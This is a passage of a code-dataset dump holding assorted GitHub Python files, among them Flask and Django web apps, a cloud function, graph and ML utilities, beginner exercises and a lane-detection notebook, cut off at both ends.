:\n\t\tself.latitude = latitude\n\t\tself.longitude = longitude\n\t\n\t@staticmethod\n\tdef getSphereDistance(lon1, lat1, lon2, lat2):\n\t\tlon1, lat1, lon2, lat2 = lon1*__RADIAN__, lat1*__RADIAN__, lon2*__RADIAN__, lat2*__RADIAN__\n\t\tdlon = lon2 - lon1\n\t\tdlat = lat2 - lat1\n\t\ta = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2\n\t\treturn __RADIUS__*(2 * atan2(sqrt(a), sqrt(1-a)))\n\t\n\t@staticmethod\n\tdef getNextSpherePoint(lon1, lat1, course, distance):\n\t\tlon1 = __RADIAN__*lon1\n\t\tlat1 = __RADIAN__*lat1\n\t\tcourse = __RADIAN__*course\n\t\tdistance = distance/21851.944728932118\n\t\t\n\t\tlat2 = asin(sin(lat1)*cos(distance) + cos(lat1)*sin(distance)*cos(course))\n\t\tlon2 = lon1 + atan2(sin(course)*sin(distance)*cos(lat1), cos(distance)-sin(lat1)*sin(lat2))\n\t\treturn lon2/__RADIAN__, 
lat2/__RADIAN__\n\n","repo_name":"Piyawanno/Xerial","sub_path":"xerial/Point.py","file_name":"Point.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"11170288151","text":"from pymongo import MongoClient\nfrom bs4 import BeautifulSoup\nfrom flask import Flask, render_template,jsonify,request\napp = Flask(__name__)\n\n#client = MongoClient('mongodb://test:test@localhost', 27017)\nclient = MongoClient('localhost', 27017)\ndb = client.kraft\ndb.counters.drop()\ndb.memoList.drop()\ndb.counters.insert_one({\"seq\" : 0})\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/memo/list', methods=['GET'])\ndef card_list():\n result = list(db.memoList.find({},{'_id' :False}))\n return jsonify({'result': 'success', 'list': result})\n \n\n\n@app.route('/memo/add',methods=['POST'])\ndef add_card():\n\n \n title = request.form['title']\n result = list(db.memoList.find({'title':title},{'_id' : False}))\n if len(result) > 0:\n return jsonify({'result' : 'fail'})\n text = request.form['text']\n seq = db.counters.find({})[0]['seq']\n \n doc = {\n '_id': seq,\n 'title' : title,\n 'text' : text,\n\n }\n db.memoList.insert_one(doc)\n db.counters.update_one({'seq':seq}, {'$set': {'seq': (seq+1)}})\n\n\n\n return jsonify({'result' : 'success','seq':seq})\n\n\n@app.route('/memo/update', methods=['POST'])\ndef update_list():\n first = request.form['first']\n title = request.form['title']\n text = request.form['text']\n \n result = list(db.memoList.find({'title':title},{'_id' : False}))\n if len(result) > 0 and first != title:\n return jsonify({'result' : 'fail'})\n db.memoList.update_one({'title':first},{'$set': {\"text\": text,\"title\": title}})\n return jsonify({'result': 'success'})\n\n\n@app.route('/memo/delete', methods=['POST'])\ndef delete_list():\n\n title = request.form['title']\n db.memoList.delete_one({'title' : title})\n\n return jsonify({'result': 'success'})\n\nif __name__ == '__main__': \n app.run('0.0.0.0',port=5000,debug=True)","repo_name":"wnstn819/webMemo","sub_path":"holo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39799597686","text":"#requirements.txt\n\"\"\"\n# Function dependencies, for example:\n# package>=version\ncoverage\ndatetime\npycodestyle\npytest\npytest-cov\npytest-mock\npython-dateutil\npytz\nfirebase_admin\ngoogle-cloud-pubsub\n\"\"\"\n\nimport base64\nimport json\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom dateutil.parser import parse\nimport pytz\nimport sys\nfrom time import sleep\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\nfrom google.cloud import pubsub_v1\n\ndef base64decoder(encoded_data):\n decoded_string = base64.b64decode(encoded_data)\n print(decoded_string)\n return decoded_string\n \n\n\ndef find_flights(event, context):\n try:\n # Set current time to compare against flight records\n current_time=datetime.utcnow()\n # Move forward one minute to check within the next minute\n current_time_plus1=current_time + timedelta(minutes=1) \n\n #Decode message from Cloud Scheduler\n event = base64decoder(event['data'])\n event = json.loads(event)\n if event['reservation_number'] == 'Priming':\n print(\"Checking for flights...\")\n else:\n print(\"Cloud Scheduler sent unidentified data.\")\n\n if not firebase_admin._apps:\n 
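# A self-contained sanity check (not part of the Point.py record above) of the
# haversine formula that Point.getSphereDistance implements; note its lon-before-lat
# argument order. The city coordinates below are illustrative approximations.
from math import radians, sin, cos, atan2, sqrt

EARTH_RADIUS_KM = 6371.01  # same constant as __RADIUS__ in the record above

def haversine_km(lon1, lat1, lon2, lat2):
    lon1, lat1, lon2, lat2 = map(radians, (lon1, lat1, lon2, lat2))
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return EARTH_RADIUS_KM * 2 * atan2(sqrt(a), sqrt(1 - a))

# Paris -> London comes out around 343 km.
print(round(haversine_km(2.3522, 48.8566, -0.1276, 51.5072), 1))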
firebase_admin.initialize_app()\n        db = firestore.client()\n\n        flights = db.collection(u'Flights').where(u'checkin_time', u'>=', current_time).where(u'checkin_time', u'<=', current_time_plus1).stream()\n\n        # To Do\n        project_id = \"GCPPROJECT\"\n        topic_id = \"YOURTOPIC\"\n\n        publisher = pubsub_v1.PublisherClient()\n        topic_path = publisher.topic_path(project_id, topic_id)\n\n\n        flights_detected = False\n\n        # For any flights found, send them to Pub/Sub\n        for flight in flights:\n            flights_detected = True\n            del flight._data['checkin_time']\n            flight_json = json.dumps(flight._data)\n            print(\"Found flight: \" + flight.id)\n            message = flight_json\n            # Data must be a bytestring\n            message = message.encode(\"utf-8\")\n            print(message)\n            # When you publish a message, the client returns a future.\n            future = publisher.publish(topic_path, data=message)\n            print(future.result())\n\n        if flights_detected == False:\n            print(\"No flights found\")\n\n\n        return(\"Checked for flights.\")\n\n    except Exception as e:\n        sleep(8)\n        raise e","repo_name":"nrlcode/swgcp","sub_path":"Cloud Functions/check_for_flights.py","file_name":"check_for_flights.py","file_ext":"py","file_size_in_byte":2478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9113597648","text":"import pandas as pd\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.metrics import classification_report\n\nfrom src.hyperopt import optimize\n\n\ndef fit_gb(X, y, optimize_params=False):\n    gb = GradientBoostingClassifier()\n    if optimize_params:\n        best_estim_ = optimize(gb, X, y)\n        return best_estim_\n    gb.fit(X, y)\n    return gb\n\n\ndef evaluate(model, X, y):\n    ypred = model.predict(X)\n    return classification_report(y, ypred)\n\n\ndef generate_submission_output(trainset, devset, predictors, target, model=None):\n    if model is None:\n        model = fit_gb(trainset[predictors], trainset[target])\n    ypred = model.predict(devset[predictors])\n    devset_system_output = pd.DataFrame(\n        {\"fileid\": devset[\"fileid\"], \"distance\": ypred})\n    devset_system_output.to_csv(\n        \"data/system_output/dev_system_output.tsv\", sep=\"\\t\", index=False\n    )\n    return devset_system_output\n\n\ndef dual_evaluation(trainset, testset, predictors, target,\n                    save_system_output=True, optimize_params=False):\n    report, predictions = {}, {}\n    for cg in [0, 1]:\n        _trainset = trainset[trainset[\"CoarseGrain\"] == cg]\n        _testset = testset[testset[\"CoarseGrain\"] == cg]\n\n        _model = fit_gb(\n            _trainset[predictors], _trainset[target], optimize_params=optimize_params)\n        _ypred = _model.predict(_testset[predictors])\n        predictions.update(\n            {fileid: pred for fileid, pred in zip(\n                _testset.fileid.values, _ypred)}\n        )\n        report[f\"cg={cg}\"] = classification_report(_testset[target], _ypred)\n        report[f\"model:cg={cg}\"] = _model\n        report[f\"trainset:cg={cg}\"] = _trainset\n        report[f\"testset:cg={cg}\"] = _testset\n    devset_system_output = pd.DataFrame(\n        {\n            \"fileid\": testset[\"fileid\"],\n            \"distance\": testset.apply(lambda row: predictions[row.fileid], axis=1),\n        }\n    )\n    if save_system_output:\n        devset_system_output.to_csv(\n            \"data/system_output/dev_system_output.tsv\", sep=\"\\t\", index=False\n        )\n    return report, devset_system_output\n\n\ndef evaluate_prediction(devset, prediction, save_system_output=True):\n    report = classification_report(devset.Distance, prediction)\n    system_output = pd.DataFrame(\n        {\"fileid\": devset[\"fileid\"], \"distance\": prediction})\n    if save_system_output:\n        system_output.to_csv(\n            
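# A minimal round-trip (not part of the record above) of the Pub/Sub-style envelope
# that find_flights expects from Cloud Scheduler: a base64-encoded JSON blob under
# event['data']. The 'reservation_number' value mirrors the record's own priming check.
import base64
import json

payload = json.dumps({"reservation_number": "Priming"}).encode("utf-8")
event = {"data": base64.b64encode(payload)}
decoded = json.loads(base64.b64decode(event["data"]))
assert decoded["reservation_number"] == "Priming"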
\"data/system_output/dev_system_output.tsv\", sep=\"\\t\", index=False\n )\n return report, system_output\n","repo_name":"Michael-OMahony/ml-labs-bootcamp-group-5","sub_path":"src/models/evaluate_xgb.py","file_name":"evaluate_xgb.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"24636116216","text":"bees = [int(x) for x in input().split()]\nhornets = [int(x) for x in input().split()]\nfor i in range(len(bees)):\n if sum(hornets) > bees[i]:\n bees[i] = 0\n else:\n bees[i] -= sum(hornets)\n hornets.pop(0)\nbees = list(filter(lambda x: x > 0, bees))\nprint(*bees, sep=' ') if len(bees) > 0 else print(*hornets, sep=' ')\n","repo_name":"iggeorgiev1979/Python_exercises","sub_path":"Fundamentals/Aditional_Exercises/2017_Extended/Lists_Algorithms/Hornet_Assault.py","file_name":"Hornet_Assault.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"71190879847","text":"import openpyxl\nfrom datetime import date\nfrom typing import List\n\nfrom device import Device\nimport mail\n\n\ndef import_from_excel(spreadsheet: str) -> List[Device]:\n # Open spreadsheet and get input sheet\n wb = openpyxl.load_workbook(spreadsheet)\n sheet = wb.active\n\n devices = []\n\n for row in range(2, sheet.max_row + 1):\n # Each row in the spreadsheet has data for one device.\n host = sheet[f'A{row}'].value\n ip = sheet[f'C{row}'].value\n snmp_group = sheet[f'D{row}'].value\n mysql_user = sheet[f'I{row}'].value\n mysql_password = sheet[f'J{row}'].value\n\n device = Device(row - 1, host, ip, snmp_group,\n mysql_user=mysql_user, mysql_password=mysql_password)\n devices.append(device)\n\n return devices\n\n\ndef assign_open_closed(sheet, column, row, value):\n if value:\n sheet[f'{column}{row}'] = 'open'\n else:\n sheet[f'{column}{row}'] = 'closed'\n\n\ndef export_to_excel(devices: List[Device], spreadsheet: str = None):\n if spreadsheet is None:\n wb = openpyxl.Workbook()\n sheet = wb.active\n else:\n wb = openpyxl.load_workbook(spreadsheet)\n sheet_name = f'{date.today().isoformat()}_check'\n sheet = wb.create_sheet(title=sheet_name)\n\n sheet['A1'] = 'name'\n sheet['B1'] = 'managementip'\n sheet['C1'] = 'state'\n sheet['D1'] = 'snmp'\n sheet['E1'] = 'ssh'\n sheet['F1'] = 'mysql'\n sheet['G1'] = 'errors'\n\n for idx, device in enumerate(devices):\n sheet[f'A{idx + 2}'] = device.host\n sheet[f'B{idx + 2}'] = device.ip\n\n if device.alive:\n sheet[f'C{idx + 2}'] = 'up'\n else:\n sheet[f'C{idx + 2}'] = 'down'\n\n assign_open_closed(sheet, 'D', idx + 2, device.snmp)\n assign_open_closed(sheet, 'E', idx + 2, device.ssh)\n assign_open_closed(sheet, 'F', idx + 2, device.mysql)\n\n sheet[f'G{idx + 2}'] = device.errors\n\n wb.save(f'{date.today().isoformat()}_check.xlsx')\n\n if spreadsheet is not None:\n try:\n mail.send(f'{date.today().isoformat()}_check.xlsx')\n except Exception as e:\n print(f'Error sending email: {e}')\n","repo_name":"thomasvincent/python-auto-discover-network-Device-Management","sub_path":"spreadsheet.py","file_name":"spreadsheet.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"42372128185","text":"from django.db import models\nfrom django.utils.translation import gettext_lazy as _\nfrom django.contrib.auth.models import AbstractBaseUser, PermissionsMixin\nfrom beer_collector.account.managers import 
CustomAccountManager\n\n\nclass Account(AbstractBaseUser, PermissionsMixin):\n    email = models.EmailField(\n        _('email address'),\n        max_length=60,\n        unique=True,\n    )\n    date_joined = models.DateTimeField(\n        _('date joined'),\n        auto_now_add=True,\n    )\n    last_login = models.DateTimeField(\n        _('last login'),\n        auto_now=True,\n    )\n    is_active = models.BooleanField(\n        _('active'),\n        default=True,\n    )\n    is_staff = models.BooleanField(\n        _('staff'),\n        default=False,\n    )\n    is_superuser = models.BooleanField(\n        _('superuser'),\n        default=False\n    )\n\n    USERNAME_FIELD = 'email'\n    REQUIRED_FIELDS = []\n\n    objects = CustomAccountManager()\n","repo_name":"momchilantonov/BeerCollector","sub_path":"beer_collector/account/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39142678273","text":"sb1,sb2=input().split() \nsb1=int(sb1) \nsb2=int(sb2) \nv=list(map(int,input().split()))\ncount=0 \nfor i in range(len(v)):\n    for j in range(i+1,len(v)):\n        if (v[i]+v[j]==sb2):\n            count+=1\n            break\nif(count):\n    print(\"yes\")\nelse:\n    print(\"no\")\n","repo_name":"jesusble/project","sub_path":"sb.py","file_name":"sb.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"11299157981","text":"#Create a program that reads two values and shows a menu on screen:\n#[ 1 ] add\n#[ 2 ] multiply\n#[ 3 ] larger\n#[ 4 ] new numbers\n#[ 5 ] exit the program\n#Your program must perform the requested operation in each case.##\nescolha = 0\nn1 = int(input('enter a number: '))\nn2 = int(input('enter a second value: '))\n\nprint('''[1] add\n[2] multiply\n[3] larger\n[4] new numbers\n[5] exit the program''')\nwhile escolha != 5:\n    escolha = int(input('what is your choice: '))\n\n    if escolha == 1:\n        print('{}'.format(n1 + n2))\n    elif escolha == 2:\n        print('{}'.format(n1 * n2))\n    elif escolha == 3:\n        if n1 > n2:\n            print('{} is the largest value entered'.format(n1))\n        if n2 > n1:\n            print('{} is the largest value entered'.format(n2))\n    elif escolha == 4:\n        print('enter new values')\n        n1 = int(input('enter a number: '))\n        n2 = int(input('enter a second value: '))\n    elif escolha == 5:\n        print('exiting....')\n    else:\n        print(' invalid choice')\n\nprint('End of program, come back soon')","repo_name":"LindomarB/Curso-em-video-python-git","sub_path":"pythonexercicios/ex059 menu de opcoes.py","file_name":"ex059 menu de opcoes.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5144992228","text":"import pygal\r\nfrom die import Die\r\n\r\ndie = Die()\r\n\r\n# make some rolls and store results in a list\r\nresults = []\r\nfor roll_num in range(1000): # increase number of simulated rolls to 1000\r\n    ans = die.roll()\r\n    results.append(ans)\r\n\r\n# analyse the results\r\nfrequencies = []\r\nfor value in range(1,die.num_sides+1): # loop through possible values\r\n    frequency = results.count(value) # count how many times each value appears\r\n    frequencies.append(frequency) # append values to frequencies\r\n\r\n# Visualise the results\r\nhist = pygal.Bar() # create instance of pygal.Bar() and store in hist # .bar() represents bar graph\r\n\r\nhist.title = \"Results of rolling one D6 n times\"\r\nhist.x_labels = [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\"]\r\nhist.x_title = \"Results\"\r\nhist.y_title = \"Frequency of Results\"\r\n\r\nhist.add(\"D6\", frequencies) # add series of values to chart\r\nhist.render_to_file(\"die_visual.svg\")\r\n","repo_name":"JamCrumpet/Lesson-notes","sub_path":"lesson 11 generating data/11.17_making_a_histogram.py","file_name":"11.17_making_a_histogram.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7162166735","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nfrom IPython import get_ipython\n\n# %% [markdown]\n# # Planar Maximally Filtered Graph (PMFG)\n# %% [markdown]\n# ### Import requirements: planarity and networkx\n\n# %%\nimport time\nimport planarity\nimport networkx as nx\n\n# %% [markdown]\n# ### define the function to compute PMFG\n# #### Firstly, we need to sort the graph with respect to weights in descending order\n\n# %%\ndef sort_graph_edges_corr(G):\n    sorted_edges = []\n    # if method == 'corr':\n    tmp = sorted(G.edges(data=True), key=lambda x: x[2]['weight'], reverse = True)\n    for source, dest, data in tmp: # in descending order!\n        # print(data)\n        sorted_edges.append({'source': source,\n                             'dest': dest,\n                             'weight': data['weight']})\n    # print(sorted_edges)\n    return sorted_edges\n\n#%%\ndef sort_graph_edges_distance(G):\n    sorted_edges = []\n    # if method == 'corr':\n    tmp = sorted(G.edges(data=True), key=lambda x: x[2]['weight'], reverse = False)\n    for source, dest, data in tmp: # in ascending order!\n        # print(data)\n        sorted_edges.append({'source': source,\n                             'dest': dest,\n                             'weight': data['weight']})\n    # print(sorted_edges)\n    return sorted_edges\n\n# %% [markdown]\n# #### The main function to compute PMFG. Firstly, we sort the graph edges, then add edges in descending order and check if the PMFG is planar. 
if not, we get rid of the edge from the PMFG\n\n# %%\ndef compute_PMFG(G):\n PMFG = nx.Graph() # initialize\n ne_total = G.number_of_edges()\n nb_nodes = len(G.nodes)\n ne_pmfg = 3*(nb_nodes-2)\n sorted_edges = sort_graph_edges_corr(G)\n t0 = time.time()\n for i, edge in enumerate(sorted_edges):\n PMFG.add_edge(edge['source'], edge['dest'], weight = edge['weight'])\n if not planarity.is_planar(PMFG):\n PMFG.remove_edge(edge['source'], edge['dest'])\n ne = PMFG.number_of_edges()\n print(\"Generating PMFG... added edges in PMFG %d/%d (%.2f%%) lookup edges in G %d/%d (%.2f%%) Elapsed TIme %.2f [sec]\" %(ne, ne_pmfg, (ne/ne_pmfg)*100, i, ne_total, (i+1/ne_total)*100, time.time()-t0), end=\"\\r\")\n if ne == ne_pmfg:\n break\n return PMFG\n\n# %% [markdown]\n# ## Example of generating PMFG\n\n# # %%\n# G = nx.random_geometric_graph(200,0.3)\n# import random\n# for (u,v,w) in G.edges(data=True):\n# G.edges[u,v]['weight'] = random.randint(1,10) # assign random weighted edge\n\n\n# # %%\n# get_ipython().run_line_magic('matplotlib', 'inline')\n# import matplotlib as plt\n\n# # find node near center (0.5,0.5)\n# dmin = 1\n# ncenter = 0\n# pos = nx.get_node_attributes(G, \"pos\")\n# for n in pos:\n# x, y = pos[n]\n# d = (x - 0.5) ** 2 + (y - 0.5) ** 2\n# if d < dmin:\n# ncenter = n\n# dmin = d\n\n# p = dict(nx.single_source_shortest_path_length(G, ncenter))\n\n# nx.draw_networkx_edges(G, pos, nodelist=[ncenter], alpha=0.4)\n# nx.draw_networkx_nodes(\n# G,\n# pos,\n# nodelist=list(p.keys()),\n# node_size=80,\n# node_color=list(p.values()),\n# cmap=plt.cm.Reds_r,\n# )\n\n\n# # %%\n# PMFG = compute_PMFG(G)\n\n\n# # %%\n# # find node near center (0.5,0.5)\n# dmin = 1\n# ncenter = 0\n# for n in pos:\n# x, y = pos[n]\n# d = (x - 0.5) ** 2 + (y - 0.5) ** 2\n# if d < dmin:\n# ncenter = n\n# dmin = d\n\n# p = dict(nx.single_source_shortest_path_length(PMFG, ncenter))\n\n# nx.draw_networkx_edges(PMFG, pos, alpha=0.4)\n# nx.draw_networkx_nodes(\n# PMFG,\n# pos,\n# nodelist=list(p.keys()),\n# node_size=80,\n# node_color=list(p.values()),\n# cmap=plt.cm.Reds_r,\n# )\n\n\n","repo_name":"Chang-Tong/System-Risk-by-Network-View","sub_path":"stock_data/make_pmfg.py","file_name":"make_pmfg.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"25640917230","text":"# -*-coding:utf-8-*-\n\nfrom . 
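# A minimal alternative sketch of the PMFG construction described in the markdown
# cells above (sort edges by weight descending, keep an edge only if the graph stays
# planar, stop at 3*(n-2) edges), written against networkx's built-in
# nx.check_planarity (networkx >= 2.x) instead of the external planarity package.
# This is illustrative only, and typically slower than the C-backed package:
import networkx as nx

def pmfg_nx(G):
    pmfg = nx.Graph()
    max_edges = 3 * (len(G) - 2)  # a maximal planar graph has 3n - 6 edges
    for u, v, w in sorted(G.edges(data="weight"), key=lambda e: e[2], reverse=True):
        pmfg.add_edge(u, v, weight=w)
        if not nx.check_planarity(pmfg)[0]:
            pmfg.remove_edge(u, v)  # adding this edge broke planarity
        if pmfg.number_of_edges() == max_edges:
            break
    return pmfg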
import api\nfrom flask import request, g, jsonify, current_app, session\nfrom ihome.util.commens import login_required\nfrom ihome.response_code import RET\nfrom ihome.models import User\nfrom ihome.util.storage_image import storage\nfrom ihome import db, constants\nimport re\n\n\n@api.route('/users/avatar', methods=['POST'])\n@login_required\ndef set_avatar():\n u'''\n 参数: 图片(多媒体表单), user_id(g.user_id)\n :return:\n '''\n # 获取数据\n avatar = request.files.get('avatar')\n user_id = g.user_id\n\n # 校验数据\n if avatar is None:\n return jsonify(errno=RET.NODATA, errmsg=u'图片未上传')\n\n # 业务处理\n # 上传文件\n image_data = avatar.read()\n try:\n file_name = storage(image_data)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.THIRDERR, errmsg=u'图片上传失败')\n\n # 保存文件路径\n try:\n user = User.query.filter_by(id=user_id).update({'avatar_url': file_name})\n db.session.commit()\n except Exception as e:\n db.session.rollback()\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=u'图片存储失败')\n\n # 返回响应\n avatar_url = constants.QINIU_URL_DOMIN + file_name\n return jsonify(errno=RET.OK, errmsg=u'上传成功', data={'avatar_url': avatar_url})\n\n\n@api.route('/users/name', methods=['PUT'])\n@login_required\ndef change_user_name():\n # 获取数据\n user_id = g.user_id\n req_data = request.get_json()\n\n # 校验数据\n if not req_data:\n return jsonify(errno=RET.PARAMERR, errmsg=u'参数不完整')\n\n username = req_data.get('username')\n if not username:\n return jsonify(errno=RET.PARAMERR, errmsg=u'用户名不能为空')\n\n # 业务处理: 更改用户名\n try:\n User.query.filter_by(id=user_id).update({'name': username})\n db.session.commit()\n except Exception as e:\n db.session.rollback()\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=u'用户名更改失败')\n\n # 返回响应\n session['name'] = username\n return jsonify(errno=RET.OK, errmsg=u'保存成功')\n\n\n@api.route('/user', methods=['GET'])\n@login_required\ndef get_user_info():\n user_id = g.user_id\n user = User.query.get(user_id)\n\n if user is None:\n return jsonify(errno=RET.NODATA, errmsg=u'用户不存在')\n\n return jsonify(errno=RET.OK, errmsg=u'查询成功', data=user.to_dict())\n\n\n@api.route('/users/auth', methods=['GET'])\n@login_required\ndef get_auth():\n user_id = g.user_id\n\n user = User.query.get(user_id)\n if user is None:\n return jsonify(errno=RET.NODATA, errmsg=u'用户不存在')\n\n return jsonify(errno=RET.OK, errmsg=u'查询成功', data=user.auth_to_dict())\n\n\n@api.route('/users/auth', methods=['POST'])\n@login_required\ndef set_auth():\n u'''\n 获取参数: real_name, id_card 格式:json\n :return:\n '''\n # 获取数据\n user_id = g.user_id\n real_name = request.form.get('real_name')\n id_card = request.form.get('id_card')\n\n # 数据校验\n if not all([real_name, id_card]):\n return jsonify(errno=RET.PARAMERR, errmsg=u'参数不完整')\n\n if not re.match(r'^[1-9]\\d{7}((0\\d)|(1[0-2]))(([0|1|2]\\d)|3[0-1])\\d{3}$|^[1-9]\\d{5}[1-9]\\d{3}((0\\d)|(1[0-2]))(([0|1|2]\\d)|3[0-1])\\d{3}([0-9]|X)$', id_card):\n return jsonify(errno=RET.PARAMERR, errmsg=u'身份证格式错误')\n\n # 业务处理: 存储认证信息\n try:\n update_result = User.query.filter_by(id=user_id, real_name=None, id_card=None)\\\n .update({'real_name': real_name, 'id_card': id_card})\n db.session.commit()\n except Exception as e:\n db.session.rollback()\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=u'认证信息存储失败')\n\n if update_result == 0:\n return jsonify(errno=RET.ROLEERR, errmsg=u'不可重复认证')\n\n # 返回响应\n return jsonify(errno=RET.OK, 
errmsg=u'认证成功')\n\n","repo_name":"shenxuexin/flask_ihome","sub_path":"ihome/api_1_0/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5210149408","text":"from dame.stages import Stages\n\nfrom .test_classes import PlusOne, PlusTwo, ThreeNums\n\n\ndef test_dag():\n    stages = Stages(ThreeNums, (PlusTwo, PlusOne))\n    assert list(iter(stages)) == [\n        PlusOne,\n        PlusTwo,\n    ]\n    assert list(stages.to(\"p1\")) == [PlusOne]\n","repo_name":"malpunek/dame","sub_path":"tests/test_stages.py","file_name":"test_stages.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36186798678","text":"import random\r\nimport tkinter as tk\r\nfrom tkinter import scrolledtext\r\n\r\nclass BingoApp:\r\n    def __init__(self, root):\r\n        self.root = root\r\n        self.root.title(\"Bingo Game\")\r\n        self.root.geometry(\"800x600\") # window size\r\n        \r\n        self.used_numbers = set()\r\n        self.remaining_numbers = set(range(1, 76))\r\n        self.past_numbers = []\r\n        \r\n        self.label = tk.Label(root, text=\"\", font=(\"Arial\", 50))\r\n        self.label.pack(pady=20)\r\n        \r\n        self.past_label = scrolledtext.ScrolledText(root, wrap=tk.WORD, width=30, height=10, font=(\"Arial\", 20))\r\n        self.past_label.pack()\r\n        \r\n        self.start_button = tk.Button(root, text=\"Next\", command=self.pick_next_number, width=10, height=2, bg=\"light sky blue\", font=(\"Arial\", 14, \"bold\"))\r\n        self.start_button.pack(pady=10)\r\n        \r\n        self.check_bingo()\r\n        \r\n    def pick_next_number(self):\r\n        if len(self.remaining_numbers) > 0:\r\n            num = random.choice(list(self.remaining_numbers))\r\n            self.remaining_numbers.remove(num)\r\n            self.used_numbers.add(num)\r\n            self.past_numbers.append(num)\r\n            self.label.config(text=str(num))\r\n            self.update_past_numbers()\r\n            self.check_bingo()\r\n        else:\r\n            self.label.config(text=\"ビンゴは終了です\")\r\n            self.start_button.config(state=tk.DISABLED)\r\n        \r\n    def update_past_numbers(self):\r\n        past_str = \", \".join(map(str, self.past_numbers))\r\n        self.past_label.delete(1.0, tk.END) # clear the existing text\r\n        self.past_label.insert(tk.INSERT, f\" {past_str}\")\r\n        \r\n    def check_bingo(self):\r\n        if len(self.used_numbers) == 75:\r\n            self.label.config(text=\"ビンゴは終了です\")\r\n            self.start_button.config(state=tk.DISABLED)\r\n\r\nif __name__ == \"__main__\":\r\n    root = tk.Tk()\r\n    app = BingoApp(root)\r\n    root.mainloop()\r\n","repo_name":"ill2659/bingo_03","sub_path":"bingo_app.py","file_name":"bingo_app.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69851560488","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[19]:\n\n\nimport cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n\n\n# In[20]:\n\n\ndef canny(image):\n    gray = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)  # use the argument, not the global lane_image\n    blur = cv2.GaussianBlur(gray, (5,5), 0)\n    canny = cv2.Canny(blur, 50, 150)\n    return canny\n\n\n# In[21]:\n\n\ndef display_lines(image,lines):\n    line_image = np.zeros_like(image)\n    if lines is not None:\n        for line in lines:\n            x1,y1,x2,y2 = line.reshape(4)\n            cv2.line(line_image, (x1,y1), (x2,y2), (255,0,0), 10)\n    return line_image\n\n\n# In[22]:\n\n\ndef region_of_interest(image):\n    height = image.shape[0]\n    width = image.shape[1]\n    polygons = np.array([[(100, height),(1100, height), (600, 400)]])\n    mask = 
np.zeros_like(image)\n cv2.fillPoly(mask, polygons, 255)\n masked_image = cv2.bitwise_and(image, mask)\n return masked_image\n\n\n# In[23]:\n\n\nimage = cv2.imread('test_image.png')\nplt.imshow(image, cmap = 'gray')\n\n\n# In[24]:\n\n\nlane_image = np.copy(image)\n\n\n# In[25]:\n\n\ncanny_image = canny(lane_image)\nplt.imshow(canny_image, cmap = 'gray')\n\n\n# In[26]:\n\n\ncropped_image = region_of_interest(canny_image)\nplt.imshow(cropped_image, cmap = 'gray')\n\n\n# In[27]:\n\n\ncropped_image_acc_gray = np.copy(cropped_image)\n# line_image_ = cv2.cvtColor(cropped_image_acc, cv2.COLOR_RGB2GRAY)\ncropped_image_acc_gray[cropped_image_acc_gray[:]<10] = 0\ncropped_image_acc_gray[cropped_image_acc_gray[:]>10] = 255\n\nplt.imshow(cropped_image_acc_gray, cmap = 'gray')\n\n\n# In[28]:\n\n\nlines = cv2.HoughLinesP(cropped_image, 2, np.pi/180, 100, np.array([]), minLineLength=40, maxLineGap=5)\n\n\n# In[29]:\n\n\nline_image = display_lines(lane_image, lines)\nplt.imshow(line_image, cmap = 'gray')\n\n\n# In[30]:\n\n\nline_image_acc = np.copy(line_image)\nline_image_acc_gray = cv2.cvtColor(line_image_acc, cv2.COLOR_RGB2GRAY)\nline_image_acc_gray[line_image_acc_gray[:]<10] = 0\nline_image_acc_gray[line_image_acc_gray[:]>10] = 255\n\nplt.imshow(line_image_acc_gray, cmap = 